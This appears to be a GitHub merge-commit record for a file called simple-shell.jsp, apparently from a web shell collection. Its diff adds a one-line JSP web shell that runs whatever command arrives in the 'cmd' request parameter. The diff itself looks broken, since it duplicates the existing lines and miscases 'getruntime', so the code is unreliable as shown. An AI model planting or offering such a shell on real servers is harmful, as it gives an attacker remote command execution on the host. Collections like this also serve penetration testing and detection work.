Merge pull request #277 from noraj/patch-2

simple-shell.jsp: fix file
This commit is contained in:
g0tmi1k
2019-03-11 16:59:45 +00:00
committed by GitHub

View File

@@ -1,3 +1,3 @@
+<%
+Runtime.getruntime().exec(request.getParameter("cmd"))
+%>
<%
Runtime.getruntime().exec(request.getParameter("cmd"))
%>